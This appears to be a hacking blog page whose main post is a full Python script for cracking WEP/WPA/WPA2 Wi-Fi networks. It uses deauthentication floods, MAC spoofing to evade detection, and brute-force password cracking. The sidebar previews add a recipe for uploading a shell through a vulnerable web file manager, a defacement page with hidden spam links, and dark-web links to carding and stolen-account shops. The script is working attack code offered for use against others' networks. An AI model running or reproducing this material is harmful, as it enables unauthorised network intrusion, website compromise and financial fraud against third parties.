Skip to main content

Wifi Cracking Script(Latest Working)

WPS cracking

# Semi-automatic and simple (but working!) WEP/WPA/WPA2 Hacking script # External tools involved: Aircrack-ng pack, John the Ripper, Hashcat Ocl, Pyrit, Crunch, xterm. # Author: Digital Gangster # Before use it you may have to execute: "pip install termcolor" #!/usr/bin/python # -*- coding: utf-8 -*- import os, sys, time from termcolor import colored def killctrl(): os.system("airmon-ng check kill") wlist = "" print "\n+===========================================================================+" print "| DWH - Simple (but working) WEP/WPA/WPA2 Hacking script |" print "| Author: Digital Gangster, https://twitter.com/digitalgangster |" print "| Usage: Just run it and let it head you :) |" print "+===========================================================================+\n" time.sleep(1.5) print "[*] Removing useless files..." os.system("rm -rf capture* || true") print "[*] Stopping (if existent) previous monitor modes..." os.system("airmon-ng stop mon0 > dwhs_out.txt && rm dwhs_out.txt") os.system("ifconfig mon0 down") print "[*] Rising permissions...\n"; os.system("chmod 777 *") print colored("[SUCCESS] OK, I am ready to start now! ;)\n", 'yellow') os.system("airmon-ng") inf = raw_input("Enter your network interface -> ") print "[*] Spoofing MAC Address to hide your ass...\n" cmd = "macchanger -r %s" %inf os.system(cmd) cmd = "airmon-ng start %s > processes.txt" %inf os.system(cmd) killctrl() print "[WARNING] Press CTRL-C when you find the network you want to hack." time.sleep(3) os.system("airodump-ng mon0") enc = raw_input("Enter the encryption of the network -> ") bssid = raw_input("Enter the BSSID of the network you want to hack -> ") ssid = raw_input("Enter the ESSID of the network you have chosen -> ") ch = raw_input("Enter the channel on which the network is listening -> ") cmd = "xterm -hold -e \"airodump-ng -w capture_file --bssid %s -c %s mon0\" &" %(bssid, ch) os.system(cmd) def client_send(): client = raw_input("Enter the BSSID (STATION) of a client connected to the network -> ") cmd = "aireplay-ng -0 10 -a %s -c %s mon0" %(bssid, client) for count in range(1,15): os.system(cmd) print colored("[WARNING] Check if \"WPA Handshake\" appeared in the other shell. Otherwise it is useless to go on!\n", 'red') time.sleep(1) # WPA/WPA2 Hacking if(enc == "WPA" or enc == "WPA2" or enc == "wpa" or enc == "wpa2"): retry = "y" while(retry == "y" or retry == "Y" or retry == "yes"): client_send() retry = raw_input("Do you want to try with another connected client? [necessary if handshake did not appear] (y/n) ") print "\n[*] Choose how to crack encrypted data: \n" print " 1) Wordlist" print " 2) BruteForce (Crunch with letters and numbers)" print " 3) JTR" print " 4) JTR+Pyrit" print " 5) JTR+Aircrack" print " 6) Hashcat" choice = raw_input("\n -> ") if(choice == "1" or choice == "5" or choice == "6"): wlist = raw_input("\n[*] Enter your wordlist -> ") if(choice == "1"): cmd = "aircrack-ng capture_file-01.cap -w ./%s" %wlist elif(choice == "2"): cmd = "crunch 8 20 abcdefghilmnopqrstuvwyxzkjABCDEFGHILMNOPQRSTUWYXZJ0123456789 | aircrack-ng -b %s capture_file-01.cap -w - -e %s" %(bssid, ssid) elif(choice == "3"): cmd = "john --incremental=all --stdout | aircrack-ng -b %s capture_file-01.cap -w - -e %s" %(bssid, ssid) elif(choice == "4"): cmd = "john --incremental=all --stdout | pyrit -r capture_file-01.cap -b %s -i - attack_passthrough" %(bssid) elif(choice == "5"): cmd = "john --stdout --wordlist=%s | aircrack-ng -b %s -e %s -w - capture_file-01.cap" %(wlist,bssid, ssid) else: os.system("aircrack-ng capture_file-01.cap -J hcfile") print colored("[WARNING] Hashcat module provides 3 different attacks. Stop the current one by yourself in case the previous one has been successfull.","red") time.sleep(2) print "[*] Using Hashcat Dictionary attack..." time.sleep(1) cmd = "hashcat -m 2500 hcfile.hccap %s" %wlist os.system(cmd) time.sleep(1) print "\n[*] Using Hashcat Rule-based attack..." time.sleep(1) cmd = "hashcat -m 2500 -r rules/best64.rule hcfile.hccap %s" %wlist os.system(cmd) time.sleep(1) print "\n[*] Using Hashcat Brute-Force attack..." time.sleep(1) print """\n ?l = abcdefghijklmnopqrstuvwxyz ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d = 0123456789 ?s = space\"#$%&'()*+,-./:;<=>?@[\]^_`{|}~" ?a = ?l?u?d?s ?b = 0x00 - 0xff\n""" brute = raw_input("Enter your bruteforce custom-charset (ex: ?l?d) -> ") string = "" found = False try: os.remove("dwhs_dec.txt") except: pass while(found is False): # This loop was implemented keeping in mind Hashcat 0.49. If you have Hashcat 0.50 you can use "--increment" flag and # replace this piece of code. As you wish. string = string + "?1" pwmin = len(string)/2 print "..Using %s characters.." %pwmin time.sleep(0.3) cmd = "hashcat -m 2500 -a 3 -n 32 --custom-charset1=%s --pw-min=%s hcfile.hccap %s -o dwhs_dec.txt" %(brute,pwmin,string) os.system(cmd) with open('dwhs_dec.txt') as f: if(len(f.read()) > 0): found = True if(choice == "1" or choice == "2" or choice == "3" or choice == "4" or choice == "5"): os.system(cmd) # WEP Hacking else: cmd = "aireplay-ng -1 0 -a %s mon0" %bssid os.system(cmd) # check if AUTH is OPN cmd = "xterm -hold -e \"aireplay-ng -3 -b %s mon0\" &" %bssid os.system(cmd) cmd = "aireplay-ng -0 0 -a %s mon0" %bssid # it speeds up retrieving packets for count in range(1,7): os.system(cmd) goon = raw_input("\n[WARNING] Wait until you got AT LEAST 30K packets, then press ENTER to go on...") cmd = "aircrack-ng capture_file-01.cap" os.system(cmd) print "Bye ;-)\n"

Comments

Popular posts from this blog

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS http://answers.microsoft.com/en-us http://archiveoflinks.com / http://community.sitepoint.com / http://de.lirio.us / http://del.icio.us / http://dondir.com / http://filesharingtalk.com / http://forum.deviantart.com / http://forum.joomla.org / http://forums.cnet.com / http://forums.hostgator.com / http://forums.mysql.com / http://forums.searchenginewatch.com / http://simplemachines.org/community/index.php http://www.247webdirectory.com / http://www.2daydir.com / http://www.9dir.com/Submit http://www.9sites.net / http://www.9w1.net / http://www.a1webdirectory.org / http://www.abacusseo.com / http://www.abc-directory.com / http://www.abigdir.com / http://www.acewebdirectory.com / http://www.add2us.com / http://www.addbusiness.net / http://www.addlink.us / http://www.addlinkzfree.com / http://www.addsite.info / http://www.afreeurl.info / http://www.agrieducation.org / http://www.alistdirectory.com / http...
200++ high pr eductinon&goverment site backline As We know how important backlinks are for rankings in Google for a blog/site and page rank which definitely is the trusted way to show how well your blog is which most advertiser look for.I have come up with top .gov & .edu website by registering where you can get backlinks easily.Sograb these backlinsk and see the magic how  your website ranks on Google with these high PR boosting .gov and .edu backlinks.A high quality backlinks worth thousands low quality backlinks, especially the one coming fromedu and .gov sites. Google loves backlinks from.edu & .gov sites and thus give your site good ranking in SERPs. An edu & .’gov backlinks is associated with an educational institute & government organization therefore considered asmost authentic and valued backlink in term of SEO because they are from non-profit source givequality information, not a spam one and since exists for long time in the field, have high ...

How to Hack Website

inurl:/editor/editor/filemanager Just open uploadtest.html Or test.html Then select PHP server Upload file Copy uploaded file url Paste it after the link Www.xyz.com //.... Enjoy Regards :- HACKER 22385

Abdul hacker deface page

Abdul hacker deface page     <EMBED src=" http://greencall.co.kr/.p/we_will_not_go_down.swf " type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">     <html>         <body onload="scrlsts()"><script type="text/javascript"> document.write('<' + 'di' + 'v sty' + 'le="position: absolute; l' + 'eft: -1946px; t' + 'op' + ': -2856px;" class="sufoxyyhvnyswxs15">'); </script> <a href=" http://cergyd7.dev2.cmantika.com/includes/index.php ">installment loans california bad credit</a> <a href=" http://www.diamondwares.net/logs/index.php ">online cash loan direct lenders</a> <a href=" http://armastroy.com/templates/index.php ">easy loan kota kinabalu</a> <a href=" http://www.magazinecambodia.com/templates/index....

Blogs on Computer Security:

Blogs on Computer Security: https://antelox.blogspot.com / http://www.dumpanalysis.org/blog / http://www.abuse.ch / http://zairon.wordpress.com / http://androguard.blogspot.com / http://blog.w4kfu.com / http://akhenath0n.blogspot.com / http://diarrlf.wordpress.com / http://deobfuscated.blogspot.com / http://www.h-i-r.net / http://mysterie.fr/blog / http://www.skullsecurity.org/blog / http://www.wrgross.com/blogs/security / http://net-effects.blogspot.com / http://eiploader.wordpress.com / http://cyb3rsleuth.blogspot.com / http://0entropy.blogspot.com / http://siri-urz.blogspot.com / http://newsoft-tech.blogspot.com / http://www.ragestorm.net/blogs / http://codeexploration.blogspot.com / http://esploit.blogspot.com / http://thexploit.com / http://mysterie.fr/blog / http://bailey.st/blog / http://touchmymalware.blogspot.ru / http://blog.delroth.net / http://novahackers.blogspot.com / http://greatis.com/blog / http://mcdermottcybersecurity.com / http://grand...

Various Forums

JuanDeLemos: 1. Kali Linux http://distrowatch.com/kali   http://www.kali.org/  http://forums.kali.org/ Kali Linux (formerly known as BackTrack) is a Debian-based distribution with a collection of security and forensics tools. It features timely security updates, support for the ARM architecture, a choice of four popular desktop environments, and seamless upgrades to newer versions. 2. Tails  http://distrowatch.com/tails  https://tails.boum.org/  https://tails.boum.org/support/index.en.html https://mailman.boum.org/listinfo/ The Amnesic Incognito Live System (Tails) is a Debian-based live CD/USB with the goal of providing complete Internet anonymity for the user. The product ships with several Internet applications, including web browser, IRC client, mail client and instant messenger, all pre-configured with security in mind and with all traffic anonymised. To achieve this, Incognito uses the Tor network to make Internet traffic very hard to trace...

Darkweb and Deepweb llinks latest 2017 Huge collection!!!!

hi guys... as u know deep web and darkweb is most dangeorus part of the internet... but without site link....what where will u surf it ... so i did some reasearch and get the collection.... hope u like it.. Gonzalo Nuñez: 1. Xillia (was legit back in the day on markets) http://cjgxp5lockl6aoyg.onion 2. http://cjgxp5lockl6aoyg.onion/worldwide-cardable-sites-by-alex 3. http://cjgxp5lockl6aoyg.onion/selling-paypal-accounts-with-balance-upto-5000dollars 4. http://cjgxp5lockl6aoyg.onion/cloned-credit-cards-free-shipping 5. 6. ——————————————————————————————- 7. 8. 9. UNSORTED 10. 11. Amberoad http://amberoadychffmyw.onion 12. KognitionsKyrkan http://wd43uqrbjwe6hpre.onion 13. Malina http://malina2ihfyawiau.onion 14. BB Compendium http://jq.26zp5ygkpszripvv.onion 15. Hackbb pages index (cauti...

hacking tools and lab

Resources (Free) Virtual Networks (VPNs) • ChaosVPN: http://wiki.hamburg.ccc.de/ChaosVPN • Gh0st Networks: http://www.gh0st.net / • Hacking Lab: https://www.hacking-lab.com / • p0wnlabs: http://p0wnlabs.com / • pwn0: https://pwn0.com / • PentestIT: https://lab.pentestit.ru / Custom Personal Targets • Hack A Server: https://hackaserver.com / • Hack Me: http://hack.me / • Hack This: https://www.hackthis.co.uk / • Smash The Stack: http://smashthestack.org / • Hack The Box: https://www.hackthebox.gr / • SecAdvise: https://labs.secadvise.com / • DarkHive: http://darkhive.net / • Avatao: https://avatao.com / • Root-Me: https://www.root-me.org / Archive/Repository • Security Conference Library: http://archive.liquidmatrix.org / • Shell-Storm.org Repository: http://repo.shell-storm.org/CTF / Misc • Bug crowd: ht...

open a new bitcoin account and made double money

open a new bitcoin account and made double money MenuAbout UsContact Us Privacy Policy Disclaimer Sitemap  Main MenuBlogging tipsBlog designing  Blog traffic How TosMake Money Online  How to open a bitcoin account, earn, double your earnings and withdraw your money to physical cash. Bloggers Prof 11:12:00 AM  4 I recently discovered that people are now interested in bitcoin because of its high rate of popularity now in telegram, but nevertheless, I would be talking today on  how to get money into your bitcoin wallet  and how to go about your funds, weather you would withdraw it or you sell it to someone, I talked about everything you need to know about bitcoin and how to create your wallet, create your wallet let's move to today's deal. There are many ways to get  money into your wallet,   you can buy and you can also earn it , I want to show you list of sites you can earn bits from fast, Afte...

Tor Darkweb Link

Tor link max telegram big acker: https://cardedlxzxsphu5y.onion/ SHOP FOR BUYING CARDED PRODUCTS https://2or24opd2hkebadv.onion/index.php  TORBAY FORUM chickencaptain: http://kpynyvym6xqi7wz2.onion/ parazite files and links max telegram big acker: https://kr5hou2zh4qtebqk.onion.cab/ezines/ ARCHIEVE OF SOME VINTAGE AS WELL AS NEW STUFFS https://superkuhbitj6tul.onion/library/ LIBRARY OF BOOKS ON VARIOUS TOPICS https://yuxv6qujajqvmypv.onion/ GUIDE ON USING AN SECURE OPERATING SYSTEM https://bpo4ybbs2apk4sk4.onion/en A COLLECTION OF TOOLS RELATED TO SECURITY P4RN3R: https://ondemand5xot4hdw.onion/  Tor On Demand max telegram big acker: https://f3mnl42ax3qtu3a7.onion/ GOVT LEAKS https://kzspryu63qbjfncp.onion/  DIGITAL PAWN SHOP https://yniir5c6cmuwslfl.onion/ STRANGE WEBSITE, CANT DESCRIBE https://vrimutd6so6a565x.onion.cab/index.php/Board ANONYMOUS POSTING https://h2am5w5ufhvdifrs.onion/ CRYPTOME ARCHIVE OF GOV CONSPIRACY FILES https://torc5bhzq6xorhb4.o...